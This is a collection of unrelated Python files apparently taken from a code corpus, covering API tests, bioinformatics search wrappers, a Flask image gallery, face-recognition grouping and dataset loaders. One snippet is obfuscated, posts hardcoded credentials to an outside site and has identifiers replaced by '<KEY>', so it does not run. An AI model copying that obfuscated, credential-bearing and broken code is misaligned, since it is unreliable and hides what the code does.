as_user.get(
f'/api/users/{another_user.id}/subscribe/',
expected_status=201,
)
as_user.get(f'/api/users/{admin.id}/subscribe/', expected_status=201)
got = as_user.get(URL)
assert tuple(got.keys()) == PAGINATION_PARAMS
assert tuple(got['results'][0].keys()) == RESPONSE_KEYS
assert got['count'] == 2
results = got['results']
assert admin.email == results[0]['email']
assert another_user.email == results[1]['email']
assert results[0]['is_subscribed']
assert results[1]['is_subscribed']
assert len(results[0]['recipes']) == 2
assert len(results[1]['recipes']) == 0
assert tuple(results[0]['recipes'][0].keys()) == RECIPE_FIELDS
def test_recipes_limit_recipes_count(
as_user,
as_admin,
admin,
ingredients,
tags,
):
create_recipes(as_admin, ingredients, tags)
as_user.get(f'/api/users/{admin.id}/subscribe/', expected_status=201)
got = as_user.get(URL, {'recipes_limit': 1})
assert len(got['results'][0]['recipes']) == 1
assert got['results'][0]['recipes_count'] == 2
def test_anon(as_anon):
as_anon.get(URL, expected_status=401)
| StarcoderdataPython |
186599 | from .queries import TerminalQuery, QueryParams
from .search import Searcher
from .services import SeqmotifService, SequenceService, StructureService, StructMotifService, TextService
class Command:
def __init__(self, url="https://search.rcsb.org/rcsbsearch/v1/query?", resp_type="entry",
start=0, rows=100):
self._set_source(url, resp_type)
self._set_resp_limits(start, rows)
def _set_source(self, url, resp_type):
self.url = url
if resp_type not in QueryParams.RETURN_TYPES.value:
raise NameError('Unknown return type, available {}'.format(QueryParams.RETURN_TYPES.value))
self.resp_type = resp_type
def _set_resp_limits(self, start, rows):
self.start = start
self.rows = rows
@classmethod
def set_source(cls, url, resp_type):
cls.url = url
if resp_type not in QueryParams.RETURN_TYPES.value:
raise NameError('Unknown return type, available {}'.format(QueryParams.RETURN_TYPES.value))
cls.resp_type = resp_type
@classmethod
def set_parser(cls, parser):
cls.parser = parser
def execute(self):
pass
class SearchMotifCommand(Command):
def __init__(self, query, type_='prosite', *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
self.query = query
self.type_ = type_
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
SeqmotifService(self.query, self.type_, "pdb_protein_sequence"), self.resp_type,
start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class SequenceSimilarityCommand(Command):
def __init__(self, sequence, evalue=1, identity=0.9, *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
self.sequence = sequence
self.evalue = evalue
self.identity = identity
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
SequenceService(self.sequence, self.evalue, self.identity, "pdb_protein_sequence"),
self.resp_type, start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class StructureSimilarityCommand(Command):
def __init__(self, entry_id, assembly_id=1, operator="strict_shape_match", *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
self.entry_id = entry_id
self.assembly_id = assembly_id
self.operator = operator
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
StructureService(self.entry_id, self.assembly_id, self.operator), self.resp_type,
start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class StructureMotifCommand(Command):
def __init__(self, entry_id, residue_ids, score_cutoff=0, exchanges=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.success = 1
self.entry_id = entry_id
self.residue_ids = residue_ids
self.score_cutoff = score_cutoff
self.exchanges = exchanges or {}
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
StructMotifService(self.entry_id, self.residue_ids, self.score_cutoff, self.exchanges),
self.resp_type, start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
class TextCommand(Command):
def __init__(self, attribute, operator, value, *args, **kwargs):
super().__init__(*args, **kwargs)
self.attribute = attribute
self.operator = operator
self.value = value
def execute(self):
searcher = Searcher(self.url,
[TerminalQuery(
TextService(self.attribute, self.operator, self.value),
self.resp_type, start=self.start, rows=self.rows, response_parser=self.parser)])
resp = searcher.perform_search()
return resp[0]
@staticmethod
def get_doc():
TextService.set_input_params()
return TextService.input_params
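

# Minimal usage sketch (illustrative only): a parser must be registered on the
# Command base class before execute(), because every command reads ``cls.parser``.
# The identity parser and the example protein sequence below are assumptions,
# not part of this module or of the RCSB service.
if __name__ == "__main__":
    Command.set_parser(lambda raw_response: raw_response)
    cmd = SequenceSimilarityCommand("MTEYKLVVVGAGGVGKSALTIQLIQNHFVDE", evalue=1, identity=0.9)
    print(cmd.execute())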
| StarcoderdataPython |
3220658 | # Write an algorithm that will identify valid IPv4 addresses in dot-decimal format. IPs should be considered valid if
# they consist of four octets, with values between 0..255 (included).
# Input to the function is guaranteed to be a single string.
# Examples
# // valid inputs:
# 1.2.3.4
# 172.16.17.32
# // invalid inputs:
# 1.2.3
# 1.2.3.4.5
# 123.456.78.90
# 123.045.067.089
# Note: leading zeros (e.g. 01.02.03.04) are considered not valid in this kata!
def is_valid_IP(strng):
    lista = strng.split(".")
    if len(lista) != 4:
        return False
    for elemento in lista:
        # isdigit() rejects empty octets, letters, spaces and signs in one check
        if not elemento.isdigit():
            return False
        # each octet must be in the range 0..255
        if int(elemento) not in range(0, 256):
            return False
        # leading zeros (e.g. "045") are not valid in this kata
        if elemento[0] == "0" and len(elemento) > 1:
            return False
    return True
assert (is_valid_IP("192.168.127.12")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP('')) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("abc.def.ghi.jkl")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("123.456.789.0")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("12.34.56")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("12.34.56 .1")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("12.34.56.-1")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("123.045.067.089")) == False, "Es una IP incorrecta, devuelve False"
assert (is_valid_IP("127.1.1.0")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP("0.0.0.0")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP("0.34.82.53")) == True, "Es una IP correcta, devuelve True"
assert (is_valid_IP("192.168.1.300")) == False, "Es una IP incorrecta, devuelve False" | StarcoderdataPython |
3333338 | """Utility functions for the kraken integration."""
from __future__ import annotations
from pykrakenapi.pykrakenapi import KrakenAPI
def get_tradable_asset_pairs(kraken_api: KrakenAPI) -> dict[str, str]:
"""Get a list of tradable asset pairs."""
tradable_asset_pairs = {}
asset_pairs_df = kraken_api.get_tradable_asset_pairs()
for pair in zip(asset_pairs_df.index.values, asset_pairs_df["wsname"]):
if not pair[0].endswith(
".d"
): # Remove darkpools https://support.kraken.com/hc/en-us/articles/360001391906-Introducing-the-Kraken-Dark-Pool
tradable_asset_pairs[pair[1]] = pair[0]
return tradable_asset_pairs
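

if __name__ == "__main__":
    # Illustrative sketch only, not part of the integration itself: assumes the
    # third-party ``krakenex`` package is installed and that network access to
    # the Kraken REST API is available.
    import krakenex

    api = KrakenAPI(krakenex.API())
    pairs = get_tradable_asset_pairs(api)
    print(pairs.get("XBT/USD"))  # REST pair code for the XBT/USD wsname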
| StarcoderdataPython |
170230 | <reponame>lennodev/ai-face-recognition-photo-grouping
import os
import shutil
import numpy as np
import tensorflow as tf
from PIL import Image as pilImage
from model.ModelLoader import ModelLoader
from service.FaceExtractService import FaceExtractService
from sklearn.preprocessing import LabelEncoder, Normalizer
class DetectService:
def __init__(self, modelLoader, faceExtractService, logger, configLoader):
self.configLoader = configLoader
self.modelLoader = modelLoader
self.logger = logger
self.faceExtractService = faceExtractService
self.predictThreshold = 80
self.outputPath = self.configLoader.getConfig("path", "outputPath")
self.normalizer = Normalizer(norm='l2') # L2 = least squares
def run(self, path):
self.logger.logInfo(
f"Start grouping process now. Please wait.....")
self.logger.logDebug(f"<Read folder images>: {path}")
# clean up output folder
shutil.rmtree(self.outputPath, ignore_errors=True)
# read faces and names mappings
fileNameFaceMap = self.faceExtractService.getEmbedFileNameFaceMap(path)
self.logger.logDebug(
f">loaded fileNameFaceMap: {len(fileNameFaceMap)}")
# prepare model for prediction
self.modelLoader.fitFaceNetModelFromFile()
# predict face
# self.logger.logDebug(f">Check is match with file name")
# self.guessIsMatchWithFileName(fileNameFaceMap)
self.logger.logDebug(f">Guess who is in the picture")
self.guessWhoInFile(path, fileNameFaceMap)
self.logger.logDebug("----------End------------\n")
self.logger.logInfo(
f"Photo grouping completed. View photo in /output folder")
def guessIsMatchWithFileName(self, fileNameFaceMap):
labelEncoder = self.modelLoader.labelEncoder
correctCnt = 0
invalidCnt = 0
unknownCnt = 0
for key in fileNameFaceMap:
fileName = key
embedFaceList = fileNameFaceMap[key]
# each face in file
for embedFace in embedFaceList:
# prediction for the face
currEmbFace = np.expand_dims(embedFace, axis=0)
predictClassArr = self.modelLoader.faceNetModel.predict(
currEmbFace)
predictClassProbArr = self.modelLoader.faceNetModel.predict_proba(
currEmbFace
)
# prepare result for display
predictClassInt = predictClassArr[0]
predictClassProb = (
predictClassProbArr[0, predictClassInt] * 100
) # get probability of predict item
predictClassName = labelEncoder.inverse_transform(
predictClassArr)
if(predictClassProb < self.predictThreshold):
personName = "Accuracy < " + \
str(self.predictThreshold) + "%, classify as Unknown"
else:
personName = predictClassName[0]
if(fileName.find(personName) >= 0):
resultStr = "Correct!"
correctCnt = correctCnt+1
else:
if(personName.find(", classify as Unknown") >= 0):
resultStr = "Unkonwn!!!!!"
unknownCnt = unknownCnt+1
else:
resultStr = "WRONG!!!!!!!!"
invalidCnt = invalidCnt+1
self.logger.logDebug(
f"Result: {resultStr}, Actual Person: {fileName}, Predict Person: {personName}, Proba: {str('{0:.2f}'.format(predictClassProb)) }%")
self.logger.logDebug("predictClass: %s" % predictClassInt)
self.logger.logDebug("predictProb: %s" % predictClassProbArr)
self.logger.logDebug(
"predictProb[0, predictClassIdx]: %s" % predictClassProb)
self.logger.logDebug("predictClassName: %s" % predictClassName)
self.logger.logDebug(
f"correctCnt: {correctCnt}, invalidCnt: {invalidCnt}, unknownCnt:{unknownCnt}")
self.logger.logDebug("----------------------\n")
def guessWhoInFile(self, path, fileNameFaceMap):
# loop each file
for key in fileNameFaceMap:
fileName = key
self.logger.logDebug(
f"------------------- Processing file {fileName} -------------------")
embedFaceList = fileNameFaceMap[key]
self.logger.logDebug(
f'embedFaceList shape:{np.asarray(embedFaceList).shape}')
# normalize list
embedFaceList = self.normalizer.transform(embedFaceList)
# each face in file
folderList = list()
for embedFace in embedFaceList:
# prediction for the face
currFace = np.expand_dims(embedFace, axis=0)
predictClassArr = self.modelLoader.faceNetModel.predict(
currFace)
predictClassProbArr = self.modelLoader.faceNetModel.predict_proba(
currFace)
self.logger.logDebug(
f"Direct result: predictClassArr: {predictClassArr}, predictClassProbArr: {predictClassProbArr}")
# prepare result for display
predictClassInt = predictClassArr[0]
predictClassProb = (
predictClassProbArr[0, predictClassInt]*100
) # get probability of predict item
predictClassName = self.modelLoader.labelEncoder.inverse_transform(
predictClassArr)
self.logger.logDebug(
f"predictClassInt: {predictClassInt}, predictClassName: {predictClassName}, predictClassProb: {predictClassProb}")
if(predictClassProb < self.predictThreshold):
personName = "classify as Unknown - " + \
str(predictClassProbArr) + ", " + predictClassName[0]
targetFolder = "Unknown"
else:
personName = predictClassName[0]
targetFolder = personName
self.logger.logDebug(
f"Guess: {personName} @ {str('{0:.2f}'.format(predictClassProb))}")
# prepare for copy to target folder
if(not targetFolder in folderList):
folderList.append(targetFolder)
# copy image to output folder
for folder in folderList:
srcPath = path+"/"+fileName
targetPath = self.outputPath+"/"+folder
os.makedirs(targetPath, exist_ok=True)
shutil.copy(srcPath, targetPath)
self.logger.logDebug(
f"File {fileName} copied to {len(folderList)} folder: {' | '.join(map(str, folderList))}\n")
| StarcoderdataPython |
3210808 | """
Parallel HTTP transport
IMPORT from multiple independent processes running in parallel
"""
import pyexasol
import _config as config
import multiprocessing
import pyexasol.callback as cb
import pandas
import pprint
printer = pprint.PrettyPrinter(indent=4, width=140)
class ImportProc(multiprocessing.Process):
def __init__(self, node):
self.node = node
self.read_pipe, self.write_pipe = multiprocessing.Pipe(False)
super().__init__()
def start(self):
super().start()
self.write_pipe.close()
@property
def exa_address(self):
return self.read_pipe.recv()
def run(self):
self.read_pipe.close()
# Init HTTP transport connection
http = pyexasol.http_transport(self.node['ipaddr'], self.node['port'])
# Send internal Exasol address to parent process
self.write_pipe.send(http.exa_address)
self.write_pipe.close()
data = [
{'user_id': 1, 'user_name': 'John', 'shard_id': self.node['idx']},
{'user_id': 2, 'user_name': 'Foo', 'shard_id': self.node['idx']},
{'user_id': 3, 'user_name': 'Bar', 'shard_id': self.node['idx']},
]
pd = pandas.DataFrame(data, columns=['user_id', 'user_name', 'shard_id'])
# Send data from DataFrame to HTTP transport
http.import_from_callback(cb.import_from_pandas, pd)
print(f"Child process {self.node['idx']} finished, imported rows: {len(pd)}")
if __name__ == '__main__':
pool_size = 5
pool = []
exa_address_list = []
C = pyexasol.connect(dsn=config.dsn, user=config.user, password=config.password, schema=config.schema)
C.execute('TRUNCATE TABLE parallel_import')
for n in C.get_nodes(pool_size):
proc = ImportProc(n)
proc.start()
pool.append(proc)
exa_address_list.append(proc.exa_address)
printer.pprint(pool)
printer.pprint(exa_address_list)
try:
C.import_parallel(exa_address_list, 'parallel_import')
except (Exception, KeyboardInterrupt):
for p in pool:
p.terminate()
else:
stmt = C.last_statement()
print(f'IMPORTED {stmt.rowcount()} rows in {stmt.execution_time}s')
finally:
for p in pool:
p.join()
| StarcoderdataPython |
170692 | <reponame>python-demo-codes/basics
# HEAD
# Augmented Assignment Operators
# DESCRIPTION
# Describes basic usage of all the augmented operators available
# RESOURCES
#
foo = 40
# Addition augmented operator
foo += 1
print(foo)
# Subtraction augmented operator
foo -= 1
print(foo)
# Multiplication augmented operator
foo *= 1
print(foo)
# Division augmented operator
foo /= 2
print(foo)
# Modulus augmented operator
foo %= 3
print(foo)
# Floor division augmented operator
foo //= 3
print(foo)
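
# Exponentiation augmented operator (added for completeness; it behaves like the others)
foo **= 2
print(foo)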
# Example Usage
strOne = 'Testing'
listOne = [1, 2]
strOne += ' String' # concat for strings and lists
print(strOne)
listOne *= 2 # replication for strings and lists
print(listOne)
| StarcoderdataPython |
143151 | # Add parent folder to path
import sys, os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
import unittest
import numpy as np
from src.Equations.KineticEnergy import KineticEnergy
from src.Common import particle_dtype
class test_kinetic_energy(unittest.TestCase):
def test(self):
num = 100
pA = np.zeros(num, dtype=particle_dtype)
kE = KineticEnergy(len(pA), pA)
self.assertEqual(kE, 0)
# Add some props
pA['m'] = 1
pA['vx'] = 1
kE = KineticEnergy(len(pA), pA)
self.assertEqual(kE, num * 0.5 * 1 * 1)
if __name__ == "__main__":
test_kinetic_energy().test() | StarcoderdataPython |
152103 | <gh_stars>0
#!/usr/bin/env python
# Egami: a very simple image gallery built using Flask, which
# serves image files found in the directory where it is executed.
# Copyright (C) 2011-2015 <NAME> <<EMAIL>>
# http://github.com/flebel/egami
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import glob
import itertools
import json
import os
from collections import OrderedDict, defaultdict
from flask import Flask, send_from_directory
from flask.ext.cache import Cache
from jinja2 import Template
# Look for files with an image extension (case insensitive.)
# Note that glob does not support regular expressions, hence the duplications.
IMAGE_EXTENSIONS = ('[gG][iI][fF]', '[jJ][pP][gG]', '[jJ][pP][eE][gG]', '[pP][nN][gG]')
# Path from where images are served. Must end with a forward slash.
IMAGES_URL = '/images/'
HTML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>{{cwd}}</title>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script type="text/javascript" charset="utf-8">
google.load("jquery", "1.7.0");
</script>
<script type="text/javascript">
//<![CDATA[
$(document).ready(function() {
var groups = {{images}};
var groups_keys = Object.keys(groups);
var images = groups[groups_keys[0]];
var number_images = images.length;
var currentIndex = number_images - 1;
function changeImage(index) {
var validIndex = getValidIndex(index);
$('img.current').attr('alt', images[validIndex]);
$('img.current').attr('src', '{{images_url}}' + images[validIndex]);
$('span.status').text("Now serving image " + (validIndex + 1) + " of " + number_images + " image(s) from '{{cwd}}':");
$('span.filename').text(images[validIndex]);
currentIndex = validIndex;
}
function getValidIndex(index) {
if (index < 0) {
index = 0;
}
if (index > images.length - 1) {
index = images.length - 1;
}
return index;
}
function preloadImage(index) {
var validIndex = getValidIndex(index);
$('<img />').attr('src', '{{images_url}}' + images[validIndex]).appendTo('body').hide();
}
function showPrevious() {
var offset = parseInt($('#offset').val());
changeImage(currentIndex - offset);
// Preload the previous image according to the (new) current position
preloadImage(currentIndex - offset);
}
function showNext() {
var offset = parseInt($('#offset').val());
changeImage(currentIndex + offset);
// Preload the next image according to the (new) current position
preloadImage(currentIndex + offset);
}
$('select#group').change(function (e) {
var group_name = $('#group').val();
images = groups[group_name];
number_images = images.length;
changeImage(number_images - 1);
});
$('button#first').click(function (e) {
e.preventDefault();
changeImage(0);
});
$('button#previous').click(function (e) {
e.preventDefault();
showPrevious();
});
$('button#next').click(function (e) {
e.preventDefault();
showNext();
});
$('button#last').click(function (e) {
e.preventDefault();
changeImage(images.length - 1);
});
$('button#preload').click(function (e) {
e.preventDefault();
var offset = parseInt($('#offset').val());
for (var i = currentIndex, n = images.length; i < n; i += offset) {
preloadImage(i);
}
});
$('a.current').click(function (e) {
e.preventDefault();
var action = $('#action').val();
switch (action) {
case 'previous':
showPrevious();
break;
case 'next':
showNext();
break;
case 'open':
                window.location = '{{images_url}}' + images[currentIndex];
break;
}
});
if (groups_keys.length <= 1) {
$('select#group').remove();
} else {
for (var i = 0; i < groups_keys.length; i++) {
$('<option/>').val(groups_keys[i]).html(groups_keys[i]).appendTo('select#group');
}
}
// Initially set the current image to the last one
if (images.length > 0) {
changeImage(currentIndex);
} else {
$('img.current').hide();
}
});
//]]>
</script>
<style type="text/css">
button, select {
height: 50px;
margin-right: 20px;
}
select#offset {
width: 50px;
}
img.current {
max-height: 640px;
max-width: 640px;
}
img.thumb {
max-height: 150px;
max-width: 150px;
}
</style>
</head>
<body>
<div id="nav">
<button id="first">First</button>
<button id="previous">Previous</button>
<select id="group">
</select>
<select id="offset">
<option value="1">1</option>
<option value="2">2</option>
<option value="5">5</option>
<option value="10">10</option>
<option value="25">25</option>
<option value="50">50</option>
<option value="100">100</option>
</select>
<button id="next">Next</button>
<button id="last">Last</button>
<hr/>
</div>
<div id="content">
<p><span class="status"></span> <span class="filename"></span></p>
<a class="current" href=""><img alt="" class="current" src=""/></a>
</div>
<div id="footer">
<hr/>
<button id="preload">Preload next images</button>
<select id="action">
<option value="previous" disabled selected>Action on click</option>
<option value="previous">Previous image</option>
<option value="next">Next image</option>
<option value="open">Open image</option>
</select>
</div>
</body>
</html>"""
app = Flask(__name__)
cache = Cache(app, config={'CACHE_TYPE': 'simple'})
cache_timeout = 15 # 15 seconds
parser = argparse.ArgumentParser(description='Exposes on the web the images found in current directory.')
parser.add_argument('port', metavar='port', default=1235, type=int, help='port on which to expose the web server.')
parser.add_argument('prefixes', metavar='prefix', type=str, nargs='*', help='list of file prefixes to be used to group images together.')
def _find_common_prefix(strings):
"""Given a list of `strings`, returns the longest common leading component.
http://stackoverflow.com/a/6718435
"""
if not strings:
return ''
s1 = min(strings)
s2 = max(strings)
for i, c in enumerate(s1):
if c != s2[i]:
return s1[:i]
return s1
def get_images():
files = []
for extension in IMAGE_EXTENSIONS:
files.extend(glob.glob('*.%s' % extension))
files.sort()
if not PREFIXES:
prefix = _find_common_prefix(files)
return {prefix: files}
groups = defaultdict(list)
for f, p in itertools.product(files, PREFIXES):
if f.startswith(p):
groups[p].append(f)
return groups
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods', 'GET')
response.headers.add('Access-Control-Allow-Origin', '*')
return response
@app.route('/')
@cache.cached(timeout=cache_timeout)
def album():
images = get_images()
template = Template(HTML)
return template.render(cwd=os.getcwdu(),
images=json.dumps(images),
images_url=IMAGES_URL)
@app.route('/latest')
def latest():
latest_images = reversed(sorted(glob.glob('*.*'), key=os.path.getctime))
humanized_extensions = [''.join(OrderedDict.fromkeys(ext.translate(None, '[]').lower())) for ext in IMAGE_EXTENSIONS]
for image, extension in itertools.product(latest_images, humanized_extensions):
if image.lower().endswith(extension):
break
return send_from_directory(os.getcwdu(), image)
@app.route(IMAGES_URL + '<filename>')
def images(filename):
return send_from_directory(os.getcwdu(), filename)
if __name__ == '__main__':
#app.debug = True
args = parser.parse_args()
PREFIXES = sorted(args.prefixes)
app.run(port=args.port)
| StarcoderdataPython |
150414 | <reponame>kjahan/evaluation
import os
from datetime import datetime
import pandas as pd
import tqdm
def load(filename, path, delim='\t'):
filename = os.path.join(path, filename)
dataframe = pd.read_csv(filename, sep=delim)
return dataframe
def parse_time(df):
    date_parse = lambda x: datetime.strptime(x, '%Y-%m-%d %H:%M:%S.%f')  # pd.datetime is deprecated; use datetime directly
df['datetime'] = df['datetime'].apply(date_parse)
return df
def parse_timestamp(df):
ts_parse = lambda x: datetime.utcfromtimestamp(int(x))
df['datetime'] = df['timestamp'].apply(ts_parse)
df = df.drop('timestamp', 1)
return df
def split(dataframe, split_time):
"""
    dataframe: pandas dataframe with a 'datetime' column
    split_time: cutoff datetime; rows at or before it go to train, later rows to test
"""
train_df = dataframe.loc[dataframe['datetime'] <= split_time]
test_df = dataframe.loc[dataframe['datetime'] > split_time]
return train_df, test_df
def generate_true_labels(test_df):
"""
test_df: a Pandas dataframe with two columns user_id and item_id
return: a dictionary from user_id to items that they have seen
"""
user_labels = {}
with tqdm.tqdm(total=test_df.shape[0]) as progress:
for index, row in test_df.iterrows():
user_id, item_id = row['user_id'], row['item_id']
try:
item_id = int(item_id)
user_labels[user_id].append(item_id)
except KeyError:
user_labels[user_id] = [item_id]
progress.update(1)
print("No of users in test fold: {}".format(len(user_labels.keys())))
return user_labels
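

if __name__ == "__main__":
    # End-to-end sketch; the file name 'interactions.tsv' and its columns
    # (user_id, item_id, timestamp) are assumptions, not requirements of this module.
    df = load("interactions.tsv", ".")
    df = parse_timestamp(df)
    train_df, test_df = split(df, datetime(2020, 1, 1))
    true_labels = generate_true_labels(test_df)
    print("train: {}, test: {}, users: {}".format(len(train_df), len(test_df), len(true_labels)))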
| StarcoderdataPython |
142194 | <filename>python/xml_count_attrib.py<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 12 15:26:30 2019
@author: Ham
HackerRanch Challenge: XML 1 - Find the Score
You are given a valid XML document, and you have to print its score.
The score is calculated by the sum of the score of each element.
For any element, the score is equal to the number of attributes it has.
Input Format
The first line contains N, the number of lines in the XML document.
The next N lines follow containing the XML document.
Output Format
Output a single line, the integer score of the given XML document.
Sample Input (also see STDIN_SIO below)
6
<feed xml:lang='en'>
<title>HackerRank</title>
<subtitle lang='en'>Programming challenges</subtitle>
<link rel='alternate' type='text/html' href='http://hackerrank.com/'/>
<updated>2013-12-25T12:00:00</updated>
</feed>
Sample Output
5
Explanation
The feed and subtitle tag have one attribute each - lang.
The title and updated tags have no attributes.
The link tag has three attributes - rel, type and href.
So, the total score is 1 + 0 + 1 + 3 + 0 == 5.
There may be any level of nesting in the XML document. To learn about XML parsing, refer here.
NOTE: In order to parse and generate an XML element tree, use the following code:
>> import xml.etree.ElementTree as etree
>> tree = etree.ElementTree(etree.fromstring(xml))
Here, XML is the variable containing the string.
Also, to find the number of keys in a dictionary, use the len function:
>> dicti = {'0': 'This is zero', '1': 'This is one'}
>> print (len(dicti))
2
"""
#import io
import xml.etree.ElementTree as etree
STDIN_SIO = """
15
<feed xml:lang='en'>
<entry>
<author gender='male'>Harsh</author>
<question type='medium' language='python'>XML 2</question>
<description type='text'>This is related to XML parsing</description>
</entry><entry>
<author gender='male'>Harsh</author>
<question type='medium'>XML 2</question>
<description type='text'>This is related to XML parsing</description>
</entry><entry>
<author gender='male'>Harsh</author>
<question type='medium'>XML 2</question>
<description type='text'>This is related to XML parsing</description>
</entry>
</feed>
""".strip()
def get_attr_number(node):
"doc"
return len(node.attrib) + sum(get_attr_number(child) for child in node)
if __name__ == '__main__':
STDIN_SIO = STDIN_SIO.split("\n", 1)[1:] # discard 1st line
#print(len(STDIN_SIO), "<" + STDIN_SIO[0] + ">")
tree = etree.ElementTree(etree.fromstring(STDIN_SIO[0]))
print(get_attr_number(tree.getroot()))
| StarcoderdataPython |
3200721 | from httpx import get,post
<KEY>CDFk=print
<KEY>DF='dunossauro'
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkDo='meu_segrdo_123'
class KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDko:
def __init__(<KEY>):
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFD.atributo=7
def <KEY>D(<KEY>):
return KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFD.atributo
def KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkoF():
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo=get('http://google.com')
return KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo
def <KEY>kF(user,passw):
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo=post('http://meusite.com',json={'password':<PASSWORD>,'username':user})
return KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkFo
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDFk(KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkoF())
KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDFk(KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCDkF(KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkDF,KMcbLdesIhpqaHjnBNuvlOYmyASfQTPWVXtEJirGxgRUzwCkDo))
# Created by pyminifier (https://github.com/liftoff/pyminifier)
| StarcoderdataPython |
82870 | import json
import os
import os.path
import cv2
import numpy as np
import torch
import torch.utils.data as data_utl
from tqdm import tqdm
from dataset.vidor import VidOR
from frames import extract_all_frames
def video_to_tensor(pic):
"""Convert a ``numpy.ndarray`` to tensor.
Converts a numpy.ndarray (T x H x W x C)
to a torch.FloatTensor of shape (C x T x H x W)
Args:
pic (numpy.ndarray): Video to be converted to tensor.
Returns:
Tensor: Converted video.
"""
return torch.from_numpy(pic.transpose([3, 0, 1, 2]))
def load_rgb_frames(video_path, image_dir, begin, end, extract_frames=False):
"""
    :param video_path: path to the source video; only used when extract_frames is True (extraction is slow!)
    :param image_dir: root directory holding the already-extracted frames (not the same argument as in extract_all_frames)
    :param begin: index of the first frame to load
    :param end: index one past the last frame to load
    :param extract_frames: if True, extract all frames from the video first (takes a long time)
    :return: float32 array of shape (num_frames, H, W, 3), scaled to [-1, 1]
"""
frames = []
video_path_splits = video_path.split('/')
image_dir_path = os.path.join(image_dir, video_path_splits[-2], video_path_splits[-1][:-4])
if extract_frames:
# Be careful! This step will take a long time!
extract_all_frames(video_path, image_dir_path)
for i in range(begin, end):
img_path = os.path.join(image_dir_path, str(i).zfill(6) + '.jpg')
if os.path.exists(img_path):
img = cv2.imread(img_path)[:, :, [2, 1, 0]]
w, h, c = img.shape
if w < 226 or h < 226:
d = 226. - min(w, h)
sc = 1 + d / min(w, h)
img = cv2.resize(img, dsize=(0, 0), fx=sc, fy=sc)
img = (img / 255.) * 2 - 1
frames.append(img)
else:
if len(frames) >= 1:
frames.append(frames[-1])
    # finally, pad the front of the list (with copies of the first frame) so its length matches end - begin
for miss_frame in range(end - begin - len(frames)):
frames.insert(0, frames[0])
return np.asarray(frames, dtype=np.float32)
def load_flow_frames(image_dir, vid, start, num):
frames = []
for i in range(start, start + num):
imgx = cv2.imread(os.path.join(image_dir, vid, vid + '-' + str(i).zfill(6) + 'x.jpg'), cv2.IMREAD_GRAYSCALE)
imgy = cv2.imread(os.path.join(image_dir, vid, vid + '-' + str(i).zfill(6) + 'y.jpg'), cv2.IMREAD_GRAYSCALE)
w, h = imgx.shape
if w < 224 or h < 224:
d = 224. - min(w, h)
sc = 1 + d / min(w, h)
imgx = cv2.resize(imgx, dsize=(0, 0), fx=sc, fy=sc)
imgy = cv2.resize(imgy, dsize=(0, 0), fx=sc, fy=sc)
imgx = (imgx / 255.) * 2 - 1
imgy = (imgy / 255.) * 2 - 1
img = np.asarray([imgx, imgy]).transpose([1, 2, 0])
frames.append(img)
return np.asarray(frames, dtype=np.float32)
def make_vidor_dataset(anno_rpath, splits, video_rpath, task, low_memory=True):
vidor_dataset = VidOR(anno_rpath, video_rpath, splits, low_memory)
if task not in ['object', 'action', 'relation']:
print(task, "is not supported! ")
exit()
